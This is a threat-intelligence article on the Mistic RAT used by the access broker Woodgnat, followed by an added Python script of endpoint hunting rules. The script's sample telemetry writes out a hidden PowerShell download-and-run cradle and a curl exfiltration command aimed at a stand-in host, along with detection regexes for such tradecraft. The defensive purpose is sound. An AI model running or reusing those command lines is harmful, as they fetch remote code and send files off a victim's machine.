A new remote access trojan (RAT) called Mistic is being used by an initial access broker (IAB) that supplies several ransomware groups, according to researchers at Broadcom’s Symantec and Carbon Black.
Woodgnat’s Expanding Threat Network
The threat actor, tracked as Woodgnat and also known as KongTuke, has been active since at least May 2024. Its operations are linked to the Qilin, Interlock, and Black Basta ransomware groups. Since April 2026, Woodgnat has deployed the Mistic RAT against organizations in sectors including education, insurance, and IT services.
Before adopting Mistic, Woodgnat was known for using ModeloRAT. Rather than targeting a particular industry, the group casts a wide net, compromising whatever it can reach and selling access to the victims that ransomware operators consider worthwhile.
Capabilities and Deployment of Mistic RAT
Mistic, also tracked as MLTBackdoor, gives its operators file manipulation, folder creation, and arbitrary code execution on the compromised host. It also lets them change the interval at which the implant checks in for new commands and instruct it to terminate itself, which helps them keep a low profile and clean up when a victim is not worth keeping.
Mistic is launched through DLL sideloading, and credential-stealing tools are often dropped alongside it. Other tools observed in these intrusions include curl, PowerShell, and the Windows Management Instrumentation command-line utility (WMIC), used for reconnaissance and data exfiltration. All three are legitimate Windows components, so detection has to rest on how they are invoked rather than on their presence.
Social Engineering and Distribution Tactics
Woodgnat distributes its malware through compromised WordPress sites and social-engineering lures that trick visitors into running commands themselves, using the ClickFix and FileFix techniques: a ClickFix lure shows a fake error or verification prompt that tells the visitor to open the Run dialog and paste a command, while FileFix does the same through the File Explorer address bar. The pasted PowerShell command gives the attackers an initial foothold, which they use to assess whether the compromised system is worth selling.
Since April 2026, the group has also posed as IT support or a helpdesk over Microsoft Teams to talk users into running malicious code. The shift from web lures to direct contact shows how quickly an access broker’s tradecraft changes, and why defenses cannot rely on blocking a single delivery channel.
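The execution chain produced by ClickFix and FileFix, the sideloaded launcher, and the follow-on use of curl and WMIC described above can all be expressed as hunting rules over endpoint telemetry. The block below is an added example, not code from Symantec, Carbon Black or the Mistic report; the Sysmon-style event records, the example.invalid URLs and the list of commonly sideloaded DLL names are constructed for illustration.

```python
"""Hunting rules for the tradecraft described above, added here as an example and
not code from Symantec, Carbon Black or the actor. Events are dicts modelled on
Sysmon fields (EventID 1 = process create, 7 = image load); all samples are
constructed, and example.invalid stands in for attacker infrastructure."""
import re
from pathlib import PureWindowsPath

# Both the Run dialog (ClickFix) and the Explorer address bar (FileFix) launch
# whatever the user pastes as a child of explorer.exe.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Download-cradle and evasion tokens typical of pasted one-liners.
CRADLE = re.compile(
    r"(?i)\b(iex|invoke-expression|irm|invoke-restmethod|iwr|invoke-webrequest|"
    r"downloadstring|frombase64string)\b|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|"
    r"-w(indowstyle)?\s+hidden|mshta\s+https?://")
# System DLL names often planted beside a signed binary for sideloading (assumption:
# the genuine copies live under C:\Windows, so one in a user-writable path is odd).
SIDELOAD_NAMES = {"version.dll", "dbghelp.dll", "cryptbase.dll", "wtsapi32.dll",
                  "userenv.dll", "profapi.dll", "dwmapi.dll", "msimg32.dll"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def _base(path):
    return PureWindowsPath(path).name.lower()

def _dir(path):
    return str(PureWindowsPath(path).parent).lower() + "\\"

def clickfix_chain(ev):
    """Rule 1: explorer.exe spawns an interpreter whose command line carries a
    cradle, hidden window or encoded payload: the chain ClickFix/FileFix produce."""
    return (ev["EventID"] == 1 and _base(ev["ParentImage"]) == "explorer.exe"
            and _base(ev["Image"]) in INTERPRETERS
            and CRADLE.search(ev["CommandLine"]) is not None)

def lolbin_followup(ev):
    """Rule 2: the follow-on tooling named in the report: curl pushing a local
    file to a URL, or wmic.exe profiling the host and domain."""
    if ev["EventID"] != 1:
        return False
    name, cmd = _base(ev["Image"]), ev["CommandLine"]
    if name == "curl.exe":
        return "://" in cmd and re.search(r"(?i)(\s-[dFT]\s|--data|--upload-file)", cmd) is not None
    if name == "wmic.exe":
        return re.search(r"(?i)\b(computersystem|useraccount|qfe|antivirusproduct)\b|/node:", cmd) is not None
    return False

def dll_sideload(ev):
    """Rule 3: an unsigned DLL carrying a system DLL name, loaded from the same
    user-writable directory as the process image (how Mistic is launched)."""
    if ev["EventID"] != 7 or ev["Signed"]:
        return False
    loaded_dir = _dir(ev["ImageLoaded"])
    return (_base(ev["ImageLoaded"]) in SIDELOAD_NAMES
            and loaded_dir == _dir(ev["Image"])
            and not loaded_dir.startswith(TRUSTED_DIRS))

RULES = (("clickfix_chain", clickfix_chain), ("lolbin_followup", lolbin_followup),
         ("dll_sideload", dll_sideload))

def hunt(events):
    """Return (event index, rule name) for every event that matches a rule."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]

# Constructed sample telemetry. "Signed" is a bool here; real Sysmon emits "true"/"false".
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",          # 0: pasted ClickFix one-liner
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm http://example.invalid/v)"'},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",          # 1: benign child of explorer
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",          # 2: admin opening PowerShell
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\wbem\wmic.exe",                     # 3: host/domain recon
     "CommandLine": "wmic computersystem get domain,name,username"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",       # 4: exfil of a staged file
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -s -X POST -d @C:\Users\u\AppData\Local\Temp\out.txt http://example.invalid/up"},
    {"EventID": 7, "Image": r"C:\Users\u\AppData\Roaming\Vendor\updater.exe",   # 5: sideload
     "ImageLoaded": r"C:\Users\u\AppData\Roaming\Vendor\version.dll", "Signed": False},
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",         # 6: legitimate load
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": True},
]

if __name__ == "__main__":
    for i, name in hunt(SAMPLE_EVENTS):
        print(f"event {i}: {name}")
```

Run against the sample, the rules flag events 0, 3, 4 and 5 and leave the three benign records alone. The explorer.exe-to-PowerShell parent relationship on its own is far too common to alert on (event 2 is an administrator opening a console), so the cradle regex is what keeps the first rule quiet; likewise the sideload rule only fires when an unsigned DLL with a System32 name appears next to the executable outside the trusted directories, which is the shape of the loader the report describes rather than every unsigned DLL on the host.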
Understanding how a broker like Woodgnat gains its footholds, from pasted one-liners and Teams impersonation to the sideloaded implant that follows, is what lets an organization detect the intrusion before the access is resold to a ransomware group.
